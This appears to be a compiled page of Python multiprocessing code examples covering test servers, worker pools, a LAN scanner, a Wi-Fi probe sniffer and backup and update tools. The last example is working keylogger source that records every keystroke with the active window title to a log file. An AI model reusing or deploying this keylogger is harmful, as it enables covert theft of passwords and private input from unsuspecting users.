Esempio n. 1
0
class KeepAliveClientTest(TestCase):

    server_address = ("127.0.0.1", 65535)

    def __init__(self, *args, **kwargs):
        super(KeepAliveClientTest, self).__init__(*args, **kwargs)
        self.server_process = Process(target=self._run_server)

    def setUp(self):
        super(KeepAliveClientTest, self).setUp()
        self.client = Client(["%s:%d" % self.server_address])
        self.server_process.start()
        time.sleep(.10)

    def tearDown(self):
        self.server_process.terminate()
        super(KeepAliveClientTest, self).tearDown()

    def _run_server(self):
        self.server = BaseHTTPServer.HTTPServer(self.server_address, ClientAddressRequestHandler)
        self.server.handle_request()

    def test_client_keepalive(self):
        for x in range(10):
            result = self.client.sql("select * from fake")

            another_result = self.client.sql("select again from fake")
            self.assertEqual(result, another_result)
Esempio n. 2
0
 def __init__(self, **kwargs):
     self.addressManager = OSC.CallbackManager()
     self.queue = Queue()
     Process.__init__(self, args=(self.queue,))
     self.daemon     = True
     self._isRunning = Value('b', True)
     self._haveSocket= Value('b', False)
Esempio n. 3
0
 def scanner_network(self,gateway):
     scan = ''
     config_gateway = gateway.split('.')
     del config_gateway[-1]
     for i in config_gateway:
         scan += str(i) + '.'
     gateway = scan
     ranger = str(self.ip_range.text()).split('-')
     jobs = []
     manager = Manager()
     on_ips = manager.dict()
     for n in xrange(int(ranger[0]),int(ranger[1])):
         ip='%s{0}'.format(n)%(gateway)
         p = Process(target=self.working,args=(ip,on_ips))
         jobs.append(p)
         p.start()
     for i in jobs: i.join()
     for i in on_ips.values():
         Headers = []
         n = i.split('|')
         self.data['IPaddress'].append(n[0])
         self.data['MacAddress'].append(n[1])
         self.data['Hostname'].append('<unknown>')
         for n, key in enumerate(reversed(self.data.keys())):
             Headers.append(key)
             for m, item in enumerate(self.data[key]):
                 item = QTableWidgetItem(item)
                 item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
                 self.tables.setItem(m, n, item)
     Headers = []
     for key in reversed(self.data.keys()):
         Headers.append(key)
     self.tables.setHorizontalHeaderLabels(Headers)
Esempio n. 4
0
def connect_multiprocess(service = VoidService, config = {}, remote_service = VoidService, remote_config = {}, args={}):
    """starts an rpyc server on a new process, bound to an arbitrary port,
    and connects to it over a socket. Basically a copy of connect_thread().
    However if args is used and if these are shared memory then changes
    will be bi-directional. That is we now have access to shared memmory.

    :param service: the local service to expose (defaults to Void)
    :param config: configuration dict
    :param server_service: the remote service to expose (of the server; defaults to Void)
    :param server_config: remote configuration dict (of the server)
    :param args: dict of local vars to pass to new connection, form {'name':var}

    Contributed by *@tvanzyl*
    """
    from multiprocessing import Process

    listener = socket.socket()
    listener.bind(("localhost", 0))
    listener.listen(1)

    def server(listener=listener, args=args):
        client = listener.accept()[0]
        listener.close()
        conn = connect_stream(SocketStream(client), service = remote_service, config = remote_config)
        try:
            for k in args:
                conn._local_root.exposed_namespace[k] = args[k]
            conn.serve_all()
        except KeyboardInterrupt:
            interrupt_main()

    t = Process(target = server)
    t.start()
    host, port = listener.getsockname()
    return connect(host, port, service = service, config = config)
Esempio n. 5
0
File: views.py Progetto: viep/cmdbac
    def benchmark(self, request, pk):
        queryset = Attempt.objects.all()
        attempt = get_object_or_404(queryset, id=pk)
        serializer = AttemptSerializer(attempt)

        # check payload
        payload = dict(request.data)
        if 'database' not in payload and 'benchmark' not in payload:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # run benchmark
        process = Process(target = utils.run_benchmark, args = (pk, payload['database'], payload['benchmark']))
        process.start()
        # utils.run_benchmark(pk, payload['database'], payload['benchmark'])
        # shoule know the deployer id 
        deployer_id = 1
        log_file_path = os.path.join(os.path.dirname(__file__), os.pardir, 'vagrant', str(deployer_id) + '.log')
        
        def stream_response_generator():
            last_line_no = 0
            while process.is_alive():
                time.sleep(1)
                with open(log_file_path, 'r') as log_file:
                    content = log_file.readlines()
                    line_no = len(content)
                    if line_no > last_line_no:
                        yield ''.join(content[last_line_no:])
                        last_line_no = line_no
            time.sleep(1)
            with open(log_file_path, 'r') as log_file:
                    content = log_file.readlines()
                    line_no = len(content)
                    if line_no > last_line_no:
                        yield ''.join(content[last_line_no:])

        return StreamingHttpResponse(stream_response_generator())
Esempio n. 6
0
 def __init__(self, _output_file,  header, _input_pipe, _disk_rows):
     Process.__init__(self)
 
     self.file_name = _output_file 
     self.input_pipe = _input_pipe
     self.write_rows = _disk_rows
     self.header = header
Esempio n. 7
0
    def _find_active_serial_ports_from(self, wait_duration, device_files):
        """
        Find and returns list of active USB serial ports.

        This spawns a process that actually does the work.

        Args:
            device_files (list of strings):
                List of device files that will be checked for serial ports.
                Note that any other device file than ttyUSBx will be ignored.

        Returns:
            List of device files that have active serial port.
            Example: ["ttyUSB2", "ttyUSB4", "ttyUSB7"]

        """
        serial_results = Queue()

        serial_finder = Process(
            target=TopologyBuilder._get_active_serial_device_files,
            args=(self, serial_results, wait_duration, device_files))
        if self._verbose:
            print "Serial thread - Finding active serial ports"

        logging.info("Finding active serial ports")
        serial_finder.start()

        return serial_results
Esempio n. 8
0
def start_short_timeout_app_process():
    # XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    p = Process(target=start_short_timeout_example_server)
    p.start()
    sleep()
    check_connection()
    return p
Esempio n. 9
0
def start_echo_server_process():
    # XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    sleep()
    p = Process(target=start_echo_server)
    p.start()
    sleep(1.5)
    return p
Esempio n. 10
0
def nct_tagging(index_name, host, port_no, process_ids,
                stopwords, umls, pos, nprocs=1):

    # open the clinical trail ids file to process
    nct_ids = []
    for line in open(process_ids, 'rb'):
        nct_ids.append(line.strip())

    # Check if index exists
    index = es_index.ElasticSearch_Index(index_name, host=host, port=port_no)
    index.add_field('ec_tags_umls', term_vector=True)

    # Get clinical
    # process each clinical trial and store to XML file
    log.info('processing clinical trials')
    procs = []
    chunksize = int(math.ceil(len(nct_ids) / float(nprocs)))
    for i in xrange(nprocs):
        p = Process(target=_worker, args=(nct_ids[chunksize * i:chunksize * (i + 1)],
                                          index_name, host, port_no,
                                          stopwords, umls, pos, (i + 1)))
        procs.append(p)
        p.start()

    for p in procs:
        p.join()
Esempio n. 11
0
 def __init__(self, func):
     Process.__init__(self)
     self.in_buffer = None
     self.out_buffer = None
     self.func = func
     # number of tokens popped from the input buffer each time
     self.n_args = len(inspect.getargspec(func).args)
Esempio n. 12
0
def send_probe_requests(interface=None, ssid=None):

    # initialize shared memory
    results = Queue()

    # start sniffer before sending out probe requests
    p = Process(target=sniffer, args=(interface, results,))
    p.start()

    # give sniffer a chance to initialize so that we don't miss
    # probe responses
    time.sleep(3)

    # send out probe requests... sniffer will catch any responses
    ProbeReq(ssid=ssid, interface='wlp3s0')

    # make sure to get results from shared memory before allowing 
    # sniffer to join with parent process 
    probe_responses = results.get()

    # join sniffer with its parent process
    p.join()

    # return results
    return probe_responses
def processFiles(patch_dir):
    root = os.getcwd()
    glbl.data_dirs = {}
    if root != patch_dir: working_path = root+"/"+patch_dir
    else: working_path = root

    for path, dirs, files in os.walk(working_path):
        if len(dirs) == 0: glbl.data_dirs[path] = ''
    

    # Multiprocessing Section
    #########################################
    Qids = glbl.data_dirs.keys()
    manager = Manager()                                      # creates shared memory manager object
    results = manager.dict()                                 # Add dictionary to manager, so it can be accessed across processes
    nextid = Queue()                                         # Create Queue object to serve as shared id generator across processes
    for qid in Qids: nextid.put(qid)                         # Load the ids to be tested into the Queue
    for x in range(0,multiprocessing.cpu_count()):           # Create one process per logical CPU
        p = Process(target=processData, args=(nextid,results)) # Assign process to processCBR function, passing in the Queue and shared dictionary
        glbl.jobs.append(p)                                   # Add the process to a list of running processes
        p.start()                                             # Start process running
    for j in glbl.jobs:
        j.join()                                              # For each process, join them back to main, blocking on each one until finished
    
    # write out results
    c = 1
    sets = results.keys()
    sets.sort()
    for x in sets:
        if results[x] != 'None':
            FINAL = open('result'+str(c)+'.txt','w')
            n = "\n************************************************************************************************\n"
            FINAL.write(n+"* "+x+'    *\n'+n+results[x]+"\n")
            FINAL.close()     
            c += 1
Esempio n. 14
0
def start_workers(config):
    '''
    Picks up all the external system configuration from the config file and starts up as many processes as non-default sections in the config.
    The following elements are required from the default configuration section :
    - solr_url : base url of the solr server.
    - nova_db_server : IP or hostname of the nova controller.
    - nova_db_port : Port of the nova db to which the workers should connect.For nova+mysql this would be 3306.
    - nova_db_creds : credentials in the format user:password
    - amqp_server : IP or hostname of the amqp server. Usually, this is same as the nova controller.
    - amqp_port : Port of the AMQP server. If using RMQ this should be 5672.
    - amqp_creds : credentials in the format user:password
    
    Each non-default section of the config should represent a resource type that this system monitors. Each individual worker corresponds to
    a resource type and is run in a separate python process.
    '''
 
    logUtils.setup_logging(config)
    global _LOGGER
    _LOGGER = logUtils.get_logger(__name__)
    for section in config.sections():
        process = Process(target=worker.run, args=(config, section,))
        process.daemon = True
        process.start()
        _LOGGER.info('Started worker process - ' + str(process.pid))
        _PROCESSES.append(process)
Esempio n. 15
0
def main():

    warnings.filterwarnings("ignore", "Degrees of freedom <= 0 for slice", RuntimeWarning)

    options = getoptions()

    setuplogger(options['log'], options['logfile'], logging.INFO)

    total_procs = options['nprocs'] * options['total_instances']
    start_offset = options['instance_id'] * options['nprocs']

    exit_code = 0

    if options['nprocs'] == 1:
        createsummary(options, None, None)
    else:
        proclist = []
        for procid in xrange(options['nprocs']):
            p = Process( target=createsummary, args=(options, total_procs, start_offset + procid) )
            p.start()
            proclist.append(p)

        for proc in proclist:
            proc.join()
            exit_code += proc.exitcode

    sys.exit(exit_code)
Esempio n. 16
0
def main():
	# Threads we will use, don't change this because each thread calculates keys for 100 games exactly
	# (You can change this if you know how, I'm too euphoric now to do more flexibility)
	start = time();
	threads = 10;
	for line in sys.stdin:
		# Parsing the stdin
		encryptedMessage,encryptedGames = line.strip().split(':');
		encryptedGames = encryptedGames.split('~');
		# Queue with keys
		q = Queue();
		# Threads
		for i in range(10):
			p = Process(target=keysFinder, args=(encryptedGames[i*100:(i+1)*100],q));
			p.start();
		# Number of threads already finished
		finished = 0;
		keys = [];
		while finished < threads:
			keys += q.get();
			finished+=1;

		# From all keys, try which one decrypts a valid message
		em = binascii.unhexlify(encryptedMessage);
		found = False;
		for key in keys:
			x = AES.new(key);
			dec = x.decrypt(em);
			if (isCorrect(dec)):
				found = True;
				# Make unpadding and print. Voila!
				print removePadding(dec.strip());
	if (sys.argv[1] == 'benchmark'):
		print "Time elapsed: ",time()-start;
Esempio n. 17
0
 def __init__(self, dt=1):
     import psutil
     Process.__init__(self)
     self.daemon = True
     self.dt = dt
     self.parent = psutil.Process(current_process().pid)
     self.parent_conn, self.child_conn = Pipe()
 def __init__(self, callback=None, log=True, log_level="DEBUG"):
     """ Initialize the data parser, connect to the can bus. """
     Process.__init__(self)
     self.callback = callback
     self.log = log
     self.log_level = log_level
     self.data = {}
Esempio n. 19
0
class TCPServer(object):
    def __init__(self, port):
        self.port = int(port)

    def start(self):
        def go(port):
            from httpretty import HTTPretty
            HTTPretty.disable()
            import socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(('localhost', port))
            s.listen(True)
            conn, addr = s.accept()

            while True:
                data = conn.recv(1024)
                conn.send(b"RECEIVED: " + bytes(data))

            conn.close()

        args = [self.port]
        self.process = Process(target=go, args=args)
        self.process.start()
        time.sleep(0.4)

    def stop(self):
        try:
            os.kill(self.process.pid, 9)
        except OSError:
            self.process.terminate()
        finally:
            self.is_running = False
Esempio n. 20
0
def webgui(args):
    os.environ["FWDB_CONFIG"] = json.dumps(get_lp(args).to_dict())
    from fireworks.flask_site.app import app
    if args.wflowquery:
        app.BASE_Q_WF = json.loads(args.wflowquery)
    if args.fwquery:
        app.BASE_Q = json.loads(args.fwquery)
        if "state" in app.BASE_Q:
            app.BASE_Q_WF["state"] = app.BASE_Q["state"]

    if not args.server_mode:
        from multiprocessing import Process
        p1 = Process(
            target=app.run,
            kwargs={"host": args.host, "port": args.port, "debug": args.debug})
        p1.start()
        import webbrowser
        time.sleep(2)
        webbrowser.open("http://{}:{}".format(args.host, args.port))
        p1.join()
    else:
        from fireworks.flask_site.app import bootstrap_app
        try:
            from fireworks.flask_site.gunicorn import (
                StandaloneApplication, number_of_workers)
        except ImportError:
            import sys
            sys.exit("Gunicorn is required for server mode. "
                     "Install using `pip install gunicorn`.")
        options = {
            'bind': '%s:%s' % (args.host, args.port),
            'workers': number_of_workers(),
        }
        StandaloneApplication(bootstrap_app, options).run()
Esempio n. 21
0
class ClockInfoUpdater(object):
    def __init__(self):
        self.weather_parent_pipe, weather_child_pipe = Pipe()
        weather = WeatherAPIClient(weather_child_pipe)
        self.weather_api_client = Process(target=weather.run_forever)
        self.weather_api_client.start()

        self.traffic_parent_pipe, traffic_child_pipe = Pipe()
        traffic = TrafficAPIClient(traffic_child_pipe)
        self.traffic_api_client = Process(target=traffic.run_forever)
        self.traffic_api_client.start()

    def run(self, clock_info, update_freq):
        now = datetime.now()
        last_update = clock_info.get('last_update_time')
        if last_update:
            update_time_delta = now - last_update
            if update_time_delta.total_seconds() < update_freq:
                return False
        clock_info['last_update_time'] = now
        update_time(clock_info, now)
        update_weather(clock_info, now, self.weather_parent_pipe)
        update_color(clock_info, now)
        update_traffic(clock_info, now, self.traffic_parent_pipe)
        return True
Esempio n. 22
0
 def __init__(self, worker, outlist, index):
     Process.__init__(self)
     self.worker = worker
     if worker is None or worker.element is None:
         raise MultiProjectException("Bug: Invalid Worker")
     self.outlist = outlist
     self.index = index
    def __init__(self, response_queue, backup_name, host_port, user, password, authdb, base_dir, binary,
                 dump_gzip=False, verbose=False):
        Process.__init__(self)
        self.host, port     = host_port.split(":")
        self.host_port      = host_port
        self.port           = int(port)
        self.response_queue = response_queue
        self.backup_name    = backup_name
        self.user           = user
        self.password       = password
        self.authdb         = authdb
        self.base_dir       = base_dir
        self.binary         = binary
        self.dump_gzip      = dump_gzip
        self.verbose        = verbose

        self._command   = None
        self.completed  = False 
        self.backup_dir = "%s/%s" % (self.base_dir, self.backup_name)
        self.dump_dir   = "%s/dump" % self.backup_dir
        self.oplog_file = "%s/oplog.bson" % self.dump_dir
        self.start_time = time()

        signal(SIGINT, self.close)
        signal(SIGTERM, self.close)
    def serve(self):
        """Start a fixed number of worker threads and put client into a queue"""

        #this is a shared state that can tell the workers to exit when set as false
        self.isRunning.value = True

        #first bind and listen to the port
        self.serverTransport.listen()

        #fork the children
        for i in range(self.numWorkers):
            try:
                w = Process(target=self.workerProcess)
                w.daemon = True
                w.start()
                self.workers.append(w)
            except (Exception) as x:
                logging.exception(x)

        #wait until the condition is set by stop()

        while True:

            self.stopCondition.acquire()
            try:
                self.stopCondition.wait()
                break
            except (SystemExit, KeyboardInterrupt):
		break
            except (Exception) as x:
                logging.exception(x)

        self.isRunning.value = False
Esempio n. 25
0
def run_stock_parser():
    symbol_q = Queue()
    price_q = Queue()

    stock_symbols = []
    with open('symbols.txt', 'r') as symfile:
        for n, line in enumerate(symfile):
            sym = line.strip()
            if sym:
                stock_symbols.append(sym)

    ncpu = len([x for x in open('/proc/cpuinfo').read().split('\n')\
                if x.find('processor') == 0])

    pool = [Process(target=read_stock_worker, args=(symbol_q, price_q, )) for _ in range(ncpu * 4)]

    for p in pool:
        p.start()
    output = Process(target=write_output_file, args=(price_q, ))
    output.start()

    for symbol in stock_symbols:
        symbol_q.put(symbol)
    symbol_q.put(_sentinel)
    for p in pool:
        p.join()
    price_q.put(_sentinel)
    output.join()
Esempio n. 26
0
 def start_parser_process(self):
     if self.mp_mode:
         from multiprocessing import Process, Event
     else:
         from multiprocessing.dummy import Process, Event
     waiting_shutdown_event = Event()
     if self.mp_mode:
         bot = self.bot.__class__(
             network_result_queue=self.network_result_queue,
             parser_result_queue=self.parser_result_queue,
             waiting_shutdown_event=waiting_shutdown_event,
             shutdown_event=self.shutdown_event,
             parser_mode=True,
             meta=self.bot.meta)
     else:
         # In non-multiprocess mode we start `run_process`
         # method in new semi-process (actually it is a thread)
         # Because the use `run_process` of main spider instance
         # all changes made in handlers are applied to main
         # spider instance, that allows to suppport deprecated
         # spiders that do not know about multiprocessing mode
         bot = self.bot
         bot.network_result_queue = self.network_result_queue
         bot.parser_result_queue = self.parser_result_queue
         bot.waiting_shutdown_event = waiting_shutdown_event
         bot.shutdown_event = self.shutdown_event
         bot.meta = self.bot.meta
     proc = Process(target=bot.run_parser)
     if not self.mp_mode:
         proc.daemon = True
     proc.start()
     return waiting_shutdown_event, proc
Esempio n. 27
0
class MultiProcessPlot(object):
	## Initilization
	def __init__(self):
		self.plotpipe, PlotterPipe = Pipe()
		## Called process for plotting
		self.plotter = ProcessPlotter()
		## Process holder
		self.plotprocess = Process(target = self.plotter, args = (PlotterPipe, ))
		self.plotprocess.daemon = True
		self.plotprocess.start()

	## Plot function
	def plot(self, finished=False):
		send = self.plotpipe.send

		if finished:
			send(None)
		else:
			if not LoopCounter % plotRefreshPeriod:
				reset = 1
			else:
				reset = 0

			## Compose data for pipe
			data = [reset,
					MessageMeasurement.pose2d.x, MessageMeasurement.pose2d.y, MessageMeasurement.pose2d.theta,
					MessageEKF.odompose2d.x, MessageEKF.odompose2d.y, MessageEKF.odompose2d.theta,
					MessageEKF.ekfpose2d.x, MessageEKF.ekfpose2d.y, MessageEKF.ekfpose2d.theta]
			# print(MessageEKF.ekfpose2d.x, MessageEKF.ekfpose2d.y, MessageEKF.ekfpose2d.theta) # //VB
			# print(MessageEKF.odompose2d.x, MessageEKF.odompose2d.y, MessageEKF.odompose2d.theta) # //VB
			## Send data through pipe
			send(data)
			## Reset global flags to receive new input
			flagSubscriber1 = False
			flagSubscriber2 = False
Esempio n. 28
0
class FakeProcess:
    '''
    Runs an instance of multiprocessing.Process, which displays fake results based on PySystemMock.fakeCommandResult{},
    or based on a generic countdown using the command string, in the event that fakeCommandResult{} doesn't match.
    This class functions as an adapter from multiprocessing.Process() to subprocess.Popen(), which the caller will expect.
    '''
    stdout = FakeStdout()  # can be read by callers as if it's a Process.stdout object
    process = None

    MOCK_STEPS_ITERATIONS = 5

    def start(self, command, fakeCommandResults):
        fakeCommandResult = self.getFakeResultForCommand(command, fakeCommandResults)
        self.process = Process(target=writeFakeCommandResultsToPipe, args=(self.stdout.writer, fakeCommandResult))
        self.process.start()

    def getFakeResultForCommand(self, command, fakeCommandResults):
        for regex in fakeCommandResults:
            match = re.search(regex, command.__str__())
            if match:
                return fakeCommandResults[regex].split('\n')
        return ["processing %s [%d]..." % (command, i) for i in range(self.MOCK_STEPS_ITERATIONS, 0, -1)]

    def poll(self):
        return self.process.exitcode

    def wait(self):
        return self.process.wait()

    def terminate(self):
        self.process.terminate()
Esempio n. 29
0
def apply_update(fname, status):
    # As soon as python-apt closes its opened files on object deletion
    # we can drop this fork workaround. As long as they keep their files
    # open, we run the code in an own fork, than the files are closed on
    # process termination an we can remount the filesystem readonly
    # without errors.
    p = Process(target=_apply_update, args=(fname, status))
    with rw_access("/", status):
        try:
            t_ver = get_target_version(fname)
        except BaseException:
            status.log('Reading xml-file failed!')
            return

        try:
            c_ver = get_current_version()
        except IOError as e:
            status.log('get current version failed: ' + str(e))
            c_ver = ""

        pre_sh(c_ver, t_ver, status)
        p.start()
        p.join()
        status.log("cleanup /var/cache/apt/archives")
        # don't use execute() here, it results in an error that the apt-cache
        # is locked. We currently don't understand this behaviour :(
        os.system("apt-get clean")
        if p.exitcode != 0:
            raise Exception(
                "Applying update failed. See logfile for more information")
        post_sh(c_ver, t_ver, status)
Esempio n. 30
0
def run_parkinglot_expt(net, n):
    "Run experiment"

    seconds = args.time

    # Start the bandwidth and cwnd monitors in the background
    monitor = Process(target=monitor_devs_ng,
            args=('%s/bwm.txt' % args.dir, 1.0))
    monitor.start()
    start_tcpprobe()

    # Get receiver and clients
    recvr = net.getNodeByName('receiver')
    sender1 = net.getNodeByName('h1')

    # Start the receiver
    port = 5001
    recvr.cmd('iperf -s -p', port,
              '> %s/iperf_server.txt' % args.dir, '&')

    waitListening(sender1, recvr, port)

    # TODO: start the sender iperf processes and wait for the flows to finish
    # Hint: Use getNodeByName() to get a handle on each sender.
    # Hint: Use sendCmd() and waitOutput() to start iperf and wait for them to finish
    # Hint: waitOutput waits for the command to finish allowing you to wait on a particular process on the host
    # iperf command to start flow: 'iperf -c %s -p %s -t %d -i 1 -yc > %s/iperf_%s.txt' % (recvr.IP(), 5001, seconds, args.dir, node_name)
    # Hint (not important): You may use progress(t) to track your experiment progress

    recvr.cmd('kill %iperf')

    # Shut down monitors
    monitor.terminate()
    stop_tcpprobe()
Esempio n. 31
0
class Mapping(object):
    def __init__(self):
        self.state = None
        self.state = None
        self.q = Queue()
        self.vp = Process(target=self.viewer_thread, args=(self.q,))
        self.vp.daemon = True
        self.vp.start()

    def viewer_thread(self, q):
        self.viewer_init(1024, 768)
        while True:
            self.viewer_refresh(q)

    # from py_pangolin:
    def viewer_init(self, w, h):
        pangolin.CreateWindowAndBind('Map Viewer', w, h)
        gl.glEnable(gl.GL_DEPTH_TEST)

        self.scam = pangolin.OpenGlRenderState(
            pangolin.ProjectionMatrix(w, h, 420, 420, w // 2, h // 2, 0.2, 10000),
            pangolin.ModelViewLookAt(0, -10, -8,
                                     0, 0, 0,
                                     0, -1, 0))
        self.handler = pangolin.Handler3D(self.scam)
        # Create Interactive View in window
        self.dcam = pangolin.CreateDisplay()
        self.dcam.SetBounds(0.0, 1.0, 0.0, 1.0, w / h)
        self.dcam.SetHandler(self.handler)  
        # hack to avoid small Pangolin, no idea why it's *2
        self.dcam.Resize(pangolin.Viewport(0, 0, w * 2, h * 2))
        self.dcam.Activate()

    def viewer_refresh(self, q):
        while not q.empty():
            self.state = q.get()

        gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
        gl.glClearColor(0.0, 0.0, 0.0, 1.0)
        self.dcam.Activate(self.scam)

        if self.state is not None:
            if self.state[0].shape[0] >= 2:
                # draw poses
                gl.glColor3f(0.0, 1.0, 0.0)
                pangolin.DrawCameras(self.state[0][:-1])

            if self.state[0].shape[0] >= 1:
                # draw current pose as yellow
                gl.glColor3f(1.0, 1.0, 0.0)
                pangolin.DrawCameras(self.state[0][-1:])

            if self.state[1].shape[0] != 0:
                # draw keypoints
                gl.glPointSize(5)
                gl.glColor3f(1.0, 0.0, 0.0)
                pangolin.DrawPoints(self.state[1], self.state[2])

        pangolin.FinishFrame()

    def draw(self, mapp):
        if self.q is None:
            return
        poses, pts, colors = [], [], []
        for f in mapp.frames:
            # invert pose for display only
            poses.append(np.linalg.inv(f.pose))
        for p in mapp.points:
            pts.append(p.loc)
            colors.append(p.color)
        self.q.put((np.array(poses), np.array(pts), np.array(colors) / 256.0))
Esempio n. 32
0
app = Flask(__name__)

if __name__ == '__main__':
    train_q = Queue()
    result_q = Queue()

    master = environ.get("MAP_MASTER", "local[*]")
    dburl = environ.get("MAP_DBURL", "mongodb://localhost")

    options()["spark_master"] = master
    options()["db_url"] = dburl
    options()["train_queue"] = train_q
    options()["result_queue"] = result_q

    p = Process(target=workloop, args=(master, train_q, result_q, dburl))
    p.start()

    # wait for worker to spin up
    result_q.get()

    def sanitize_model(m):
        result = dict([(k, m[k]) for k in ["_id", "name", "urls", "status"]])
        result["id"] = result.pop("_id")
        return result
    
    @app.route("/live")
    def live():
        response = None
        try:
            model_collection().find()
Esempio n. 33
0
#     print('='*args2)
#
# if __name__ == '__main__':
#     p_lst = []
#     for i in range(10):
#         p = Process(target=func, args=(10*i, 20*i))
#         p_lst.append(p)
#         p.start()
#     [p.join() for p in p_lst]
#     print('运行完了')


def func(filename, content):
    with open(filename, 'w') as f:
        f.write(content*10*'*')


if __name__ == '__main__':
    p_lst = []
    for i in range(5):
        p = Process(target=func, args=('info{}'.format(i), i))
        p_lst.append(p)
        p.start()
    [p.join() for p in p_lst]   # 之前的所有进程必须在这里都执行完才能执行下面的代码
    print([i for i in os.walk(r'D:\program\oldmantest\quanzhan\day36andday37')])

# 同步: 0.1 * 500 = 50
# 异步: 500 0.1   = 0.1
# 多进程写文件
# 首先往文件中写文件
# 像用户展示写入文件之后文件夹中所有的文件名
Esempio n. 34
0
        first_level.do_find_passwd()
    elif cmd == '0131':
        # 0131 user_id
        first_level.do_find_passwd_info() 
    elif cmd == '014':
        #退出请求(登录失败或者注册失败后退出)pass
        first_level.do_quit()
#服务器检查客户端存活状态
def check_alive(sec,conn,q):
    check_heart(sec,conn,q)
    #定时任务 用schedue


if __name__ == "__main__":
    print("start....")
    p1 = Process(target = tcp_server)
    p2 = Process(target = udp_server,args=(queue_online,))
    # p3 = Process(target = check_alive,args = (45,db_operate,q))
    p4 = Process(target = file_server)
    p5 = Process(target = find_friend_server,args=(db_operate,))
    p2.daemon = True
    # p3.daemon = True
    #保护进程不可以有子进程
    # p4.daemon = True
    p1.start()
    p2.start()
    # p3.start()
    p4.start()
    p5.start()
    p1.join()
    #进程结束时关闭数据库
Esempio n. 35
0
        f.Prune(3, 3)
      pickle.dump(f, open(fn, "w"))
      print "feature build %s succ" % fn
      return
    else:
      cache.append(r)
      if len(cache) >= cs:
        f.Build(cache)
        cache = []


q_norm = Queue(10*10000)
jobs = []


p = Process(target = BuildJob, args = (q_norm, "chat_text_f.dat", 100))
jobs.append(p)
p.start()

# word_vec =[]
fp = open("chat_words.txt","w")
fk = open("chat_keywords.txt","w")
cnt = 0

#for line in open(sys.argv[1], "r"):
for line in open("all_cont.txt", "r"):
  cnt += 1
  if cnt % 1000 == 0:
    time_str = datetime.datetime.now().isoformat()
    print "[%s]: %d" % (time_str, cnt)
from datetime import datetime


def test_with_barrier(synchronizer, serializer):
    name = multiprocessing.current_process().name
    synchronizer.wait()
    now = time()
    with serializer:
        print("process %s ------> %s" % (name, datetime.fromtimestamp(now)))


def test_without_barrier():
    name = multiprocessing.current_process().name
    now = time()
    print("process %s ------> %s" % (name, datetime.fromtimestamp(now)))


if __name__ == '__main__':
    synchronizer = Barrier(2)
    serializer = Lock()
    Process(name='p1 - test_with_barrier',
            target=test_with_barrier,
            args=(synchronizer, serializer)).start()
    Process(name='p2 - test_with_barrier',
            target=test_with_barrier,
            args=(synchronizer, serializer)).start()
    Process(name='p3 - test_without_barrier',
            target=test_without_barrier).start()
    Process(name='p4 - test_without_barrier',
            target=test_without_barrier).start()
Esempio n. 37
0
如果子进程的任务在主进程任务结束后就没有存在的必要了,那么该子进程应该在开启前
就被设置程守护进程.主进程代码运行结束, 守护进程随即终止

* 守护进程会在主进程代码执行结束后就终止
* 守护进程内无法再开启子进程,否则抛出异常:
AssertionError: daemonic processes are not allowed to have children
'''
from multiprocessing import Process
import time
import random


def task(name):
    print('%s is piaoing' % name)
    time.sleep(random.randrange(1, 3))
    print('%s is piao end' % name)


if __name__ == '__main__':
    p = Process(target=task, args=('egon', ))
    p.daemon = True  # 一定要在p.start()前设置,设置p为守护进程,禁止p创建子进程,并且让父进程代码执行结束,p即终止运行
    p.start()
    time.sleep(1)
    print('main')  # 只要终端打印出这一行内容,守护进程p也就梗着结束了
'''
➜  Concurrency1 git:(master) ✗ python daemon.py 
main
➜  Concurrency1 git:(master) ✗ python daemon.py
egon is piaoing
main
'''
Esempio n. 38
0
	def createProcesses(self):
		self.QueryProcesses = []
		for i in range(self.numProc):		
			process = Process(target = RateQueryWorker(), args = (self.troughQueue,self.resultQueue,))
			self.QueryProcesses.append(process)
Esempio n. 39
0
	def createProcesses(self):
		self.QueryProcesses = []
		for i in range(self.numProc):		
			process = Process(target = COOLQueryWorker(timeConverter=self.timeConverter), args = (self.troughQueue,self.resultQueue,))
			self.QueryProcesses.append(process)
Esempio n. 40
0
  for i in range(0,len(this_train_sizes)):
    for j in range(num_trials):
      profile_features,labels = shuffle(profile_features,labels)
      if 1-this_train_sizes[i] > 0:
        cur_X_train, cur_X_test, cur_y_train, cur_y_test = train_test_split(profile_features,labels,test_size=1-this_train_sizes[i],random_state = n)
      else:
        cur_X_train, cur_y_train = profile_features,labels
      reg = RandomForestClassifier().fit(cur_X_train,cur_y_train)
      pred_probs_tmp = reg.predict_proba(profile_features)
      pred_probs = np.zeros((len(pred_probs_tmp),3))
      pred_probs[:pred_probs_tmp.shape[0],:pred_probs_tmp.shape[1]] = pred_probs_tmp
      results[num_trials*len(this_train_sizes)*n  + j*len(this_train_sizes) + i] = log_loss(labels,pred_probs)

procs = []
for n in range(num_trials):
  p = Process(target=run_trial, args=(profile_features,labels,this_train_sizes,results,sub_proc_trials,n))
  p.start()
  procs.append(p)
for n in range(num_trials):
  procs[n].join()

results = np.array(results)
results = results.reshape((num_trials*sub_proc_trials,len(this_train_sizes)))
print(results)
min_results = np.min(results,axis=0)
avg_results = np.mean(results,axis=0)
max_results = np.max(results,axis=0)

json.dump(avg_results.tolist(),open("avg_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
json.dump(min_results.tolist(),open("min_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
json.dump(max_results.tolist(),open("max_random_"+str(num_trials*sub_proc_trials)+"sim.json","w"))
Esempio n. 41
0
        # getting the current active window
        user32 = ctypes.WinDLL('user32', use_last_error=True)
        curr_window = user32.GetForegroundWindow()
        event_window_name = win32gui.GetWindowText(curr_window)
        if window_name != event_window_name:
            window_name = event_window_name
        logging.info(f"{key}    window: {window_name}")  # logging data
    except:
        pass


def start_logging():
    # print('logging started..')
    logging.basicConfig(filename=filename, level=logging.DEBUG, format="%(asctime)s %(message)s")
    with Listener(on_press=on_press) as listener:
        listener.join()


if __name__ == '__main__':
    # to disallow multiple instance of the program
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_qpgy_main')
